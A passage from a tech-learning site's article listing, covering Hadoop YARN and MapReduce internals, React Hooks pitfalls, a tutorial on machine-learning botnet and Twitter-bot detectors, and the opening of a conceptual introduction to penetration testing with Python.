FSDataOutputStream which points to data queue. The data queue negotiates with the NameNode to allocate new blocks on suitable DataNodes. The data is then copied to that DataNode, and as per replication strategy the data it further copied from that DataNode to rest of the DataNodes. It’s important to note that the data is never moved through the NameNode as it would have caused performance bottleneck. YARN Simplest way to understand Yet Another Resource manager (YARN) is to think of it as an operating system on a Cluster; provisioning resources, scheduling jobs & node maintenance. With Hadoop 2.x, MapReduce model of processing the data and managing the cluster (job tracker/task tracker) was divided. While data processing was still left to MapReduce, the cluster’s resource allocation (or rather, scheduling) task was assigned to a new component called YARN. Another objective that YARN met was that it made MapReduce one of the techniques to process the data rather than being the only technology to process data on HDFS as was the case in Hadoop 1.x systems. This paradigm shift opened the flood gate for the development of interesting applications around Hadoop and a new eco-system of not only classical MapReduce processing system evolved. It didn’t take much time after that for Apache Spark to break the hegemony of classical MapReduce and become arguably the most popular processing framework for parallel computing as far as active development and adoption is concerned. In order to serve Multi-tenancy, fault tolerance, and resource isolation in YARN, it developed below components to manage the cluster seamlessly. ResourceManager: It negotiates resources for different compute programmes on a Hadoop cluster while guaranteeing the following: resource isolation, data locality, fault tolerance, task prioritization and effective cluster capacity utilization. A configurable scheduler allows Resource Manager the flexibility to schedule and prioritize different applications as per the need. Tasks served by RM while serving clients: Using client or APIs user can submit or terminate an application. The user can also gather statistics on submitted application, cluster and queue information. RM also priorities ADMIN tasks higher over any other task to perform clean up or maintenance activities on a cluster like refreshing node-list, the queues configuration. Tasks served by RM while serving Cluster Nodes: Provisioning and de-provisioning of new nodes forms an important task of RM. Each node sends a heartbeat at a configured interval, default being 10 minutes. Any failure of node in doing so is treated as dead node. As a clean-up activity all the supposedly running process including containers are marked dead too. Tasks served by RM while serving Application Master: RM registers new AM while terminating the successfully executed ones. Just like Cluster Nodes if the heartbeat of AM is not received within a preconfigured duration, default value being 10 minutes, then AM is marked dead and all the associated containers too are marked dead. But since YARN is reliable as far as Application execution is concerned hence a new AM is rescheduled to try another execution on a new container until it reaches the retry configurable default count of 4. Scheduling and other miscellaneous tasks served by RM: RM maintains a list of running, submitted and executed applications along with its statistics such as execution time , status etc. Privileges of user as well as of applications are maintained and compared while serving various requests of user per application life cycle. RM scheduler oversees resource allocation for application such as memory allocation. Two common scheduling algorithms used in YARN are fair scheduling and capacity scheduling algorithms. NodeManager: NM exist per node of the cluster on a slightly similar fashion as to what slave nodes are in master slave architecture. When a NM starts it sends the information to RM for its availability to share its resources for upcoming jobs. There on NM sends periodic signal also called heartbeat to RM informing them of its status as being alive in the cluster. Primarily NM is responsible for launching containers that has been requested by AM with certain resource requirement such as memory, disk and so on. Once the containers are up and running the NM keeps a watch not on the status of the container’s task but on the resource utilization of the container and kill them if the container start utilizing more resources then it has been provisioned for. Apart from managing the life cycle of the container the NM also keeps RM informed about node’s health. ApplicationMaster: AM gets launched per submitted application and manages the life cycle of submitted application. However the first and foremost task AM does is to negotiate resources from RM to launch task specific containers at different nodes. Once containers are launched the AM keeps track of all the containers’ task status. If any node goes down or the container gets killed because of using excess resources or otherwise in such cases AM renegotiates resources from RM and launch those pending tasks again. AM also keeps reporting the status of the submitted application directly to the user and other such statistics to RM. ApplicationMaster implementation is framework specific and it is because of this reason application/framework specific code if transferred the AM , and it the AM that distributes it further across. This important feature also makes YARN technology agnostic as any framework can implement its ApplicationMaster and then utilized the resources of YARN cluster seamlessly. Container: Container in an abstract sense is a set of minimal resources such as CPU, RAM, Disk I/O, Disk space etc. that are required to run a task independently on a node. The first container after submitting the job is launched by RM to host ApplicationMaster. It is the AM which then negotiates resources from RM in the form of containers, which then gets hosted in different nodes across the Hadoop Cluster. Process flow of application submission in YARN: Step 1: Using a client or APIs the user submits the application let’s say a Spark Job jar. Resource Manager, whose primary task is to gather and report all the applications running on entire Hadoop cluster and available resources on respective Hadoop nodes, depending on the privileges of the user submitting the job accepts the newly submitted task. Step2: After this RM delegates the task to scheduler. The scheduler then searches for a container which can host the application-specific Application Master. While Scheduler does takes into consideration parameters like availability of resources, task priority, data locality etc. before scheduling or launching an Application Master, it has no role in monitoring or restarting a failed job. It is the responsibility of RM to keep track of AM and restart them in a new container when be it fails. Step 3: Once the Application Master gets launched it becomes the prerogative of AM to oversee the resources negotiation with RM for launching task specific containers. Negotiations with RM is typically over:    The priority of the tasks at hand.    Number of containers to be launched to complete the tasks.    The resources need to execute the tasks i.e. RAM, CPU (since Hadoop 3.x).    Available nodes where job containers can be launched with required resources    Depending on the priority and availability of resources the RM grants containers represented by container ID and hostname of the node on which it can be launched. Step 4: The AM then request the NM of the respective hosts to launch the containers with specific ID’s and resource configuration. The NM then launches the containers but keeps a watch on the resources usage of the task. If for example the container starts utilizing more resources than it has been provisioned for then in such scenario the said containers are killed by the NM. This greatly improves the job isolation and fair sharing of resources guarantee that YARN provides as otherwise it would have impacted the execution of other containers. However, it is important to note that the job status and application status as a whole is managed by AM. It falls in the domain of AM to continuously monitor any delay or dead containers, simultaneously negotiating with RM to launch new containers to reassign the task of dead containers. Step 5: The Containers executing on different nodes sends Application specific statistics to AM at specific intervals. Step 6: AM also reports the status of the application directly to the client that submitted the specific application, in our case a Spark Job. Step 7: NM monitors the resources being utilized by all the containers on the respective nodes and keeps sending a periodic update to RM. Step 8: The AM sends periodic statistics such application status, task failure, log information to RM Overview Of MapReduce Before delving deep into MapReduce implementation in Hadoop, let’s first understand the MapReduce as a concept in parallel computing and why it is a preferred way of computing. MapReduce comprises two mutually exclusive but dependent phases each capable of running on two different machines or nodes: Map: In Map phase transformation of data takes place. It splits data into key value pair by splitting it on a keyword. Suppose we have a text file and we would want to do an analysis such as to count total number of words or even the frequency with which the word has occurred in the text file. This is the classical Word Count problem of MapReduce, now to address this problem first we will have to identify the splitting keyword so that the data can be spilt and be converted into a key value pair. Let’s begin with John Lennon's song Imagine. Sample Text: Imagine there's no heaven It's easy if you try No hell below us Above us only sky Imagine all the people living for today After running Map phase on the sampled text and splitting it over <space> it will get converted to key value pair as follows: <imagine, 1> <there's, 1> <no, 1> <heaven, 1> <it's, 1> <easy, 1> <if, 1> <you, 1> <try, 1> <no, 1> <hell, 1> <below, 1> <us, 1> <above, 1> <us, 1> <only, 1> <sky, 1> <imagine, 1> <all, 1> <the, 1> <people, 1> <living, 1> <for, 1> <today, 1>] The key here represents the word and value represents the count, also it should be noted that we have converted all the keys to lowercase to reduce any further complexity arising out of matching case sensitive keys. Reduce: Reduce phase deals with aggregation of Map phase result and hence all the key value pairs are aggregated over key. So the Map output of the text would get aggregated as follows: [<imagine, 2> <there's, 1> <no, 2> <heaven, 1> <it's, 1> <easy, 1> <if, 1> <you, 1> <try, 1> <hell, 1> <below, 1> <us, 2> <above, 1> <only, 1> <sky, 1> <all, 1> <the, 1> <people, 1> <living, 1> <for, 1> <today, 1>] As we can see both Map and Reduce phase can be run exclusively and hence can use independent nodes in cluster to process the data. This approach of separation of tasks into smaller units called Map and Reduce has revolutionized general purpose distributed/parallel computing, which we now know as MapReduce. Apache Hadoop's MapReduce has been implemented pretty much the same way as discussed except for adding extra features into how the data from Map phase of each node gets transferred to their designated Reduce phase node. Hadoop's implementation of MapReduce enriches the Map and Reduce phase by adding few more concrete steps in between to make it fault tolerant and truly distributed. We can describe MR jobs on YARN in five stages. Job Submission Stage: When a client submits a MR Job following things happen RM is requested for an application ID. Input data location is checked and if present then file split size is computed. Job's output location need to exist as well. If all the three conditions are met then the MR job jar along with its configuration ,details of input split are copied to HDFS in a directory named the application ID provided by RM. And then the job is submitted to RM to launch a job specific Application Master, MRAppMaster. MAP Stage: Once RM receives the client's request for launching MRAppMaster, a call is made to YARN scheduler for assigning a container. As per resource availability the container is granted and hence the MRAppMaster is launched at the designated node with provisioned resources. After this MRAppMaster fetches input split information from the HDFS path that was submitted by the client and computes the number of Mapper task that will be launched based on the splits. Depending on number of Mappers it also calculates the required number of Reducers as per configuration, If MRAppMaster now finds the number of Mapper ,Reducer & size of input files to be small enough to be run in the same JVM then it goes ahead in doing so, such tasks are called Uber task. However, in other scenarios MRAppMaster negotiates container resources from RM for running these tasks albeit Mapper tasks having higher order and priority. This is so as Mapper tasks must finish before sorting phase can start. Data locality is another concern for containers hosting Mappers as data local nodes are preferred over rack local, with least preference being given to remote node hosted data. But when it comes to Reduce phase no such preference of data locality exist for containers. Containers hosting Mapper function first copy mapReduce JAR & configuration files locally and then launch a class YarnChild in the JVM. The mapper then start reading the input files, process them by making key value pairs and writes them in a circular buffer. Shuffle and Sort Phase: Considering circular buffer has size constraint, after a certain percentage where default being 80, a thread gets spawned which spills the data from buffer. But before copying the spilled data to disk, it is first partitioned with respect to its Reducer then the background thread also sorts the partitioned data on key and if combiner is mentioned then combines the data too. This process optimizes the data once it is copied to their respective partitioned folder. This process is continued until all the data from circular buffer gets written to disk. A background thread again checks if the number of spilled files in each partition is within the range of configurable parameter or else the files are merged and combiner is run over them until it falls within the limit of the parameter. Map task keeps updating the status to ApplicationMaster its entire life cycle, it is only when 5 percent of Map task has been completed that the reduce task start. An auxiliary service in the NodeManager serving Reduce task starts a Netty web server that makes a request to MRAppMaster for Mapper hosts having specific Mapper partitioned files. All the partitioned files that pertain to the Reducer is copied to their respective nodes in similar fashion. Since multiple files gets copied as data from various nodes representing that reduce nodes gets collected, a background thread merges the sorted map file again sorts them and if Combiner is configured then combines the result too. Reduce Stage: It is important to note here that at this stage every input file of each reducer should have been sorted by key, this is the presumption with which Reducer starts processing these records and converts the key value pair into aggregated list. Once reducer processes the data it writes them to the output folder as was mentioned during Job submission. Clean up stage: Each Reducer sends periodic update to MRAppMaster about the task completion, once the Reduce task is over the application master starts the clean-up activity. The submitted job status is changed from running to successful, all the temporary and intermediate files and folders are deleted .The application statistics are archived to job history server. Summary In this article we saw what is HDFS and YARN along with MapReduce in which we learned different function of MapReduce and HDFS I/O. Resources for Article: Further resources on this subject: Getting Started with Apache Spark DataFrames [article] Five common questions for .NET/Java developers learning JavaScript and Node.js [article] Getting Started with Apache Hadoop and Apache Spark [article]
Read more
  • 0
  • 0
  • 41115
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-5-pitfalls-of-react-hooks-you-should-avoid-kent-c-dodds
Sugandha Lahoti
09 Sep 2019
7 min read
Save for later

5 pitfalls of React Hooks you should avoid - Kent C. Dodds

Sugandha Lahoti
09 Sep 2019
7 min read
The React community first introduced Hooks, back in October 2018 as a JavaScript function to allow using React without classes. The idea was simple - With the help of Hooks, you will be able to “hook into” or use React state and other React features from function components. In February, React 16.8 released with the stable implementation of Hooks. As much as Hooks are popular, there are certain pitfalls which developers should avoid when they are learning and adopting React Hooks. In his talk, “React Hook Pitfalls” at React Rally 2019 (August 22-23 2019), Kent C. Dodds talks about 5 common pitfalls of React Hooks and how to avoid/fix them. Kent is a world renowned speaker, maintainer and contributor of hundreds of popular npm packages. He's actively involved in the open source community of React and general JavaScript ecosystem. He’s also the creator of react-testing-library which provides simple and complete React DOM testing utilities that encourage good testing practices. Tl;dr Problem: Starting without a good foundation Solution: Read the React Hooks docs and the FAQ Problem: Not using (or ignoring) the ESLint plugin Solution: Install, use, and follow the ESLint plugin Problem: Thinking in Lifecycles Solution: Don't think about Lifecycles, think about synchronizing side effects to state Problem: Overthinking performance Solution: React is fast by default and so research before applying performance optimizations pre-maturely Problem: Overthinking the testing of React hooks Solution: Avoid testing ‘implementation details’ of the component. Pitfall #1 Starting without a good foundation Often React developers begin coding without reading the documentation and that leads to a number of issues and small problems. Kent recommends developers to start by reading the React Hooks documentation and the FAQ section thoroughly. He jokingly adds, “Once you read the frequently asked questions, you can ask the infrequently asked questions. And then maybe those will get in the docs, too. In fact, you can make a pull request and put it in yourself.” Pitfall #2: Not using or (ignoring) the ESLint plugin The ESLint plugin is the official plugin built by the React team. It has two rules: "rules of hooks" and "exhaustive deps." The default recommended configuration of these rules is to set "rules of hooks" to an error, and the "exhaustive deps" to a warning. The linter plugin enforces these rules automatically. The two “Rules of Hooks” are: Don’t call Hooks inside loops, conditions, or nested functions Instead, always use Hooks at the top level of your React function. By following this rule, you ensure that Hooks are called in the same order each time a component renders. Only Call Hooks from React Functions Don’t call Hooks from regular JavaScript functions. Instead, you can either call Hooks from React function components or call them from custom Hooks. Kent agrees that sometimes the rule is incapable of performing static analysis on your code properly due to limitations of ESLint. “I believe”, he says, “ this is why it's recommended to set the exhaustive deps rule to "warn" instead of "error." When this happens, the plugin will tell you so in the warning. He recommends  developers should restructure their code to avoid that warning. The solution Kent offers for this pitfall is to Install, follow, and use the ESLint plugin. The ESLint plugin, he says will not only catch easily missable bugs, but it will also teach you things about your code and hooks in the process. Pitfall #3: Thinking in Lifecycles In Hooks the components are declarative. Kent says that this feature allows you to stop thinking about "when things should happen in the lifecycle of the component" (which doesn't matter that much) and more about "when things should happen in relation to state changes" (which matters much more.) With React Hooks, he adds, you're not thinking about component Lifecycles, instead you're thinking about synchronizing the state of the side-effects with the state of the application. This idea is difficult for React developers to grasp initially, however once you do it, he adds, you will naturally experience fewer bugs in your apps thanks to the design of the API. https://twitter.com/ryanflorence/status/1125041041063665666 Solution: Think about synchronizing side effects to state, rather than lifecycle methods. Pitfall #4: Overthinking performance Kent says that even though it's really important to be considerate of performance, you should also think about your code complexity. If your code is complex, you can't give people the great features they're looking for, as you will be spending all your time, dealing with the complexity of your code. He adds, "unnecessary re-renders" are not necessarily bad for performance. Just because a component re-renders, doesn't mean the DOM will get updated (updating the DOM can be slow). React does a great job at optimizing itself; it’s fast by default. For this, he mentions. “If your app's unnecessary re-renders are causing your app to be slow, first investigate why renders are slow. If rendering your app is so slow that a few extra re-renders produces a noticeable slow-down, then you'll likely still have performance problems when you hit "necessary re-renders." Once you fix what's making the render slow, you may find that unnecessary re-renders aren't causing problems for you anymore.” If still unnecessary re-renders are causing you performance problems, then you can unpack the built-in performance optimization APIs like React.memo, React.useMemo, and React.useCallback. More information on this on Kent’s blogpost on useMemo and useCallback. Solution: React is fast by default and so research before applying performance optimizations pre-maturely; profile your app and then optimize it. Pitfall #5: Overthinking the testing of React Hooks Kent says, that people are often concerned that they need to rewrite their tests along with all of their components when they refactor to hooks from class components. He explains, “Whether your component is implemented via Hooks or as a class, it is an implementation detail of the component. Therefore, if your test is written in such a way that reveals that, then refactoring your component to hooks will naturally cause your test to break.” He adds, “But the end-user doesn't care about whether your components are written with hooks or classes. They just care about being able to interact with what those components render to the screen. So if your tests interact with what's being rendered, then it doesn't matter how that stuff gets rendered to the screen, it'll all work whether you're using classes or hooks.” So, to avoid this pitfall, Kent’s recommendation is that you write tests that will work irrespective of whether you're using classes or hook. Before you upgrade to Hooks, start writing your tests free of implementation detail and your refactored hooks can be validated by the tests that you've written for your classes. The more your tests resemble the way your software is used, the more confidence they can give you. In review: Read the docs and the FAQ. Install, use and follow the ESLint plugin. Think about synchronizing side effects to state. Profile your app and then optimize it. Avoid testing implementation details. Watch the full talk on YouTube. https://www.youtube.com/watch?v=VIRcX2X7EUk Read more about React #Reactgate forces React leaders to confront community’s toxic culture head on React.js: why you should learn the front end JavaScript library and how to get started Ionic React RC is now out!
Read more
  • 0
  • 0
  • 41093

article-image-build-botnet-detectors-using-machine-learning-algorithms-in-python-tutorial
Melisha Dsouza
26 Aug 2018
12 min read
Save for later

Build botnet detectors using machine learning algorithms in Python [Tutorial]

Melisha Dsouza
26 Aug 2018
12 min read
Botnets are connected computers that perform a number of repetitive tasks to keep websites going. Connected devices play an important role in modern life. From smart home appliances, computers, coffee machines, and cameras, to connected cars, this huge shift in our lifestyles has made our lives easier. Unfortunately, these exposed devices could be easily targeted by attackers and cybercriminals who could use them later to enable larger-scale attacks. Security vendors provide many solutions and products to defend against botnets, but in this tutorial, we are going to learn how to build novel botnet detection systems with Python and machine learning techniques. You will find all the code discussed, in addition to some other useful scripts, in the following repository: https://github.com/PacktPublishing/Mastering-Machine-Learning-for-Penetration-Testing/tree/master/Chapter05 This article is an excerpt from a book written by Chiheb Chebbi titled Mastering Machine Learning for Penetration Testing We are going to learn how to build different botnet detection systems with many machine learning algorithms. As a start to a first practical lab, let's start by building a machine learning-based botnet detector using different classifiers. By now, I hope you have acquired a clear understanding about the major steps of building machine learning systems. So, I believe that you already know that, as a first step, we need to look for a dataset. Many educational institutions and organizations are given a set of collected datasets from internal laboratories. One of the most well known botnet datasets is called the CTU-13 dataset. It is a labeled dataset with botnet, normal, and background traffic delivered by CTU University, Czech Republic. During their work, they tried to capture real botnet traffic mixed with normal traffic and background traffic. To download the dataset and check out more information about it, you can visit the following link: https://mcfp.weebly.com/the-ctu-13-dataset-a-labeled-dataset-with-botnet-normal-and-background-traffic.html. The dataset is bidirectional NetFlow files. But what are bidirectional NetFlow files? Netflow is an internet protocol developed by Cisco. The goal of this protocol is to collect IP traffic information and monitor network traffic in order to have a clearer view about the network traffic flow. The main components of a NetFlow architecture are a NetFlow Exporter, a Netflow collector, and a Flow Storage. The following diagram illustrates the different components of a NetFlow infrastructure: When it comes to NetFlow generally, when host A sends an information to host B and from host B to host A as a reply, the operation is named unidirectional NetFlow. The sending and the reply are considered different operations. In bidirectional NetFlow, we consider the flows from host A and host B as one flow. Let's download the dataset by using the following command: $ wget --no-check-certificate https://mcfp.felk.cvut.cz/publicDatasets/CTU-13-Dataset/CTU-13-Dataset.tar.bz2 Extract the downloaded tar.bz2 file by using the following command: # tar xvjf CTU-13-Dataset.tar.bz2 The file contains all the datasets, with the different scenarios. For the demonstration, we are going to use dataset 8 (scenario 8). You can select any scenario or you can use your own collected data, or any other .binetflow files delivered by other institutions: Load the data using pandas as usual: >>> import pandas as pd >>> data = pd.read_csv("capture20110816-3.binetflow") >>> data['Label'] = data.Label.str.contains("Botnet") Exploring the data is essential in any data-centric project. For example, you can start by checking the names of the features or the columns: >> data.columns The command results in the columns of the dataset: StartTime, Dur, Proto, SrcAddr, Sport, Dir, DstAddr, Dport, State, sTos, dTos, TotPkts, TotBytes, SrcBytes, and Label. The columns represent the features used in the dataset; for example, Dur represents duration, Sport represents the source port, and so on. You can find the full list of features in the chapter's GitHub repository. Before training the model, we need to build some scripts to prepare the data. This time, we are going to build a separate Python script to prepare data, and later we can just import it into the main script. I will call the first script DataPreparation.py. There are many proposals done to help extract the features and prepare data to build botnet detectors using machine learning. In our case, I customized two new scripts inspired by the data loading scripts built by NagabhushanS: from __future__ import division import os, sys import threading After importing the required Python packages, we created a class called Prepare to select training and testing data: class Prepare(threading.Thread): def __init__(self, X, Y, XT, YT, accLabel=None): threading.Thread.__init__(self) self.X = X self.Y = Y self.XT=XT self.YT=YT self.accLabel= accLabel def run(self): X = np.zeros(self.X.shape) Y = np.zeros(self.Y.shape) XT = np.zeros(self.XT.shape) YT = np.zeros(self.YT.shape) np.copyto(X, self.X) np.copyto(Y, self.Y) np.copyto(XT, self.XT) np.copyto(YT, self.YT) for i in range(9): X[:, i] = (X[:, i] - X[:, i].mean()) / (X[:, i].std()) for i in range(9): XT[:, i] = (XT[:, i] - XT[:, i].mean()) / (XT[:, i].std()) The second script is called LoadData.py. You can find it on GitHub and use it directly in your projects to load data from .binetflow files and generate a pickle file. Let's use what we developed previously to train the models. After building the data loader and preparing the machine learning algorithms that we are going to use, it is time to train and test the models. First, load the data from the pickle file, which is why we need to import the pickle Python library. Don't forget to import the previous scripts using: import LoadData import DataPreparation import pickle file = open('flowdata.pickle', 'rb') data = pickle.load(file) Select the data sections: Xdata = data[0] Ydata = data[1] XdataT = data[2] YdataT = data[3] As machine learning classifiers, we are going to try many different algorithms so later we can select the best algorithm for our model. Import the required modules to use four machine learning algorithms from sklearn: from sklearn.linear_model import * from sklearn.tree import * from sklearn.naive_bayes import * from sklearn.neighbors import * Prepare the data by using the previous module build. Don't forget to import DataPreparation by typing import DataPreparation: >>> DataPreparation.Prepare(Xdata,Ydata,XdataT,YdataT) Now, we can train the models; and to do that, we are going to train the model with different techniques so later we can select the most suitable machine learning technique for our project. The steps are like what we learned in previous projects: after preparing the data and selecting the features, define the machine learning algorithm, fit the model, and print out the score after defining its variable. As machine learning classifiers, we are going to test many of them. Let's start with a decision tree: Decision tree model: >>> clf = DecisionTreeClassifier() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print (“The Score of the Decision Tree Classifier is”, Score * 100) The score of the decision tree classifier is 99% Logistic regression model: >>> clf = LogisticRegression(C=10000) >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print ("The Score of the Logistic Regression Classifier is", Score * 100) The score of the logistic regression classifier is 96% Gaussian Naive Bayes model: >>> clf = GaussianNB() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print("The Score of the Gaussian Naive Bayes classifier is", Score * 100) The score of the Gaussian Naive Bayes classifier is 72% k-Nearest Neighbors model: >>> clf = KNeighborsClassifier() >>> clf.fit(Xdata,Ydata) >>> Prediction = clf.predict(XdataT) >>> Score = clf.score(XdataT,YdataT) >>> print("The Score of the K-Nearest Neighbours classifier is", Score * 100) The score of the k-Nearest Neighbors classifier is 96% Neural network model: To build a Neural network Model use the following code: >>> from keras.models import * >>> from keras.layers import Dense, Activation >>> from keras.optimizers import * model = Sequential() model.add(Dense(10, input_dim=9, activation="sigmoid")) model.add(Dense(10, activation='sigmoid')) model.add(Dense(1)) sgd = SGD(lr=0.01, decay=0.000001, momentum=0.9, nesterov=True) model.compile(optimizer=sgd, loss='mse') model.fit(Xdata, Ydata, nb_epoch=200, batch_size=100) Score = model.evaluate(XdataT, YdataT, verbose=0) Print(“The Score of the Neural Network is”, Score * 100 ) With this code, we imported the required Keras modules, we built the layers, we compiled the model with an SGD optimizer, we fit the model, and we printed out the score of the model. How to build a Twitter bot detector In the previous sections, we saw how to build a machine learning-based botnet detector. In this new project, we are going to deal with a different problem instead of defending against botnet malware. We are going to detect Twitter bots because they are also dangerous and can perform malicious actions. For the model, we are going to use the NYU Tandon Spring 2017 Machine Learning Competition: Twitter Bot classification dataset. You can download it from this link: https://www.kaggle.com/c/twitter-bot-classification/data. Import the required Python packages: >>> import pandas as pd >>> import numpy as np >>> import seaborn Let's load the data using pandas and highlight the bot and non-bot data: >>> data = pd.read_csv('training_data_2_csv_UTF.csv') >>> Bots = data[data.bot==1] >> NonBots = data[data.bot==0] Visualization with seaborn In every project, I want to help you discover new data visualization Python libraries because, as you saw, data engineering and visualization are essential to every modern data-centric project. This time, I chose seaborn to visualize the data and explore it before starting the training phase. Seaborn is a Python library for making statistical visualizations. The following is an example of generating a plot with seaborn: >>> data = np.random.multivariate_normal([0, 0], [[5, 2], [2, 2]], size=2000) >>> data = pd.DataFrame(data, columns=['x', 'y']) >>> for col in 'xy': ... seaborn.kdeplot(data[col], shade=True) For example, in our case, if we want to identify the missing data: matplotlib.pyplot.figure(figsize=(10,6)) seaborn.heatmap(data.isnull(), yticklabels=False, cbar=False, cmap='viridis') matplotlib.pyplot.tight_layout() The previous two code snippets were some examples to learn how to visualize data. Visualization helps data scientists to explore and learn more about the data. Now, let's go back and continue building our model. Identify the bag of words by selecting some bad words used by Twitter bots. The following is an example of bad words used by a bot. Of course, you can add more words: bag_of_words_bot = r'bot|b0t|cannabis|tweet me|mishear|follow me|updates every|gorilla|yes_ofc|forget' \ r'expos|kill|bbb|truthe|fake|anony|free|virus|funky|RNA|jargon' \ r'nerd|swag|jack|chick|prison|paper|pokem|xx|freak|ffd|dunia|clone|genie|bbb' \ r'ffd|onlyman|emoji|joke|troll|droop|free|every|wow|cheese|yeah|bio|magic|wizard|face' Now, it is time to identify training features: data['screen_name_binary'] = data.screen_name.str.contains(bag_of_words_bot, case=False, na=False) data['name_binary'] = data.name.str.contains(bag_of_words_bot, case=False, na=False) data['description_binary'] = data.description.str.contains(bag_of_words_bot, case=False, na=False) data['status_binary'] = data.status.str.contains(bag_of_words_bot, case=False, na=False) Feature extraction: Let's select features to use in our model: data['listed_count_binary'] = (data.listed_count>20000)==False features = ['screen_name_binary', 'name_binary', 'description_binary', 'status_binary', 'verified', 'followers_count', 'friends_count', 'statuses_count', 'listed_count_binary', 'bot'] Now, train the model with a decision tree classifier: from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score, roc_curve, auc from sklearn.model_selection import train_test_split We import some previously discussed modules: X = data[features].iloc[:,:-1] y = data[features].iloc[:,-1] We define the classifier: clf = DecisionTreeClassifier(criterion='entropy', min_samples_leaf=50, min_samples_split=10) We split the classifier: X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=101) We fit the model: clf.fit(X_train, y_train) y_pred_train = clf.predict(X_train) y_pred_test = clf.predict(X_test) We print out the accuracy scores: print("Training Accuracy: %.5f" %accuracy_score(y_train, y_pred_train)) print("Test Accuracy: %.5f" %accuracy_score(y_test, y_pred_test)) Our model detects Twitter bots with an 88% detection rate, which is a good accuracy rate. This technique is not the only possible way to detect botnets. Researchers have proposed many other models based on different machine learning algorithms, such as Linear SVM and decision trees. All these techniques have an accuracy of 90%. Most studies showed that feature engineering was a key contributor to improving machine learning models. To study a real-world case, check out a paper called What we learn from learning - Understanding capabilities and limitations of machine learning in botnet attacks (https://arxiv.org/pdf/1805.01333.pdf), conducted by David Santana, Shan Suthaharan, and Somya Mohanty. Summary In this tutorial, we learned how to build a botnet detector and a Twitter botnet detecter with different machine learning algorithms. To become a master at penetration testing using machine learning with Python, check out this book Mastering Machine Learning for Penetration Testing Cisco and Huawei Routers hacked via backdoor attacks and botnets How to protect yourself from a botnet attack Tackle trolls with Machine Learning bots: Filtering out inappropriate content just got easy
Read more
  • 0
  • 0
  • 41089

article-image-pentesting-using-python
Packt
04 Feb 2015
22 min read
Save for later

Pentesting Using Python

Packt
04 Feb 2015
22 min read
 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, 